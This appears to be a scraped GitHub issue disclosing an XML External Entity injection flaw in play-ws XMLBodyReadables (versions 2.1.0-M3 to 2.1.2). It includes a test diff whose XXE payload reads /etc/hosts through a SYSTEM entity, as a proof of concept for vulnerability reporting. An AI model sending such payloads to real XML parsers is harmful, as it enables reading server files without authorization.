play-ws XMLBodyReadables has "XML External Entity Injection" vulnerability

XMLBodyReadables has "XML External Entity Injection" vulnerability

Open xuwei-k opened this issue 4 years ago • 0 comments

Play WS Version (2.5.x / etc)

since v2.1.0-M3 to v2.1.2

API (Scala / Java / Neither / Both)

Scala

Operating System (Ubuntu 15.10 / MacOS 10.10 / Windows 10)

unrelated

JDK (Oracle 1.8.0_72, OpenJDK 1.8.x, Azul Zing)

unrelated

Library Dependencies

unrelated

Expected Behavior

Actual Behavior

Reproducible Test Case

--- a/integration-tests/src/test/scala/play/api/libs/ws/ahc/XMLRequestSpec.scala
+++ b/integration-tests/src/test/scala/play/api/libs/ws/ahc/XMLRequestSpec.scala
@@ -65,6 +65,13 @@ class XMLRequestSpec extends Specification with Mockito with AfterAll with MustM
     ByteString.fromArray(req.getByteData).utf8String must be_==("<hello><test/></hello>")
   }
 
+  "XXE injection vulnerability" in {
+    val test = """<!DOCTYPE name [<!ENTITY hosts SYSTEM "file:///etc/hosts"> ]><foo>&hosts;</foo>"""
+    val value: Elem = XMLBodyReadables.readableAsXml.transform(new StubResponse(test.getBytes(StandardCharsets.UTF_8)))
+    println(value) // print my /etc/hosts 😇 
+    true
+  }
+

sbt "integration-tests/testOnly play.api.libs.ws.ahc.XMLRequestSpec"

note

6 years ago https://github.com/playframework/playframework/commit/dc94b943ee5dc
regression 😢 ? https://github.com/playframework/play-ws/commit/46d7a1f9ec32b81db77b494b7a57c9e9b610fa5d https://github.com/playframework/play-ws/pull/329

Apr 06 '20 05:04 xuwei-k

play-ws play-ws copied to clipboard

XMLBodyReadables has "XML External Entity Injection" vulnerability

Play WS Version (2.5.x / etc)

API (Scala / Java / Neither / Both)

Operating System (Ubuntu 15.10 / MacOS 10.10 / Windows 10)

JDK (Oracle 1.8.0_72, OpenJDK 1.8.x, Azul Zing)

Library Dependencies

Expected Behavior

Actual Behavior

Reproducible Test Case

note

play-ws
play-ws copied to clipboard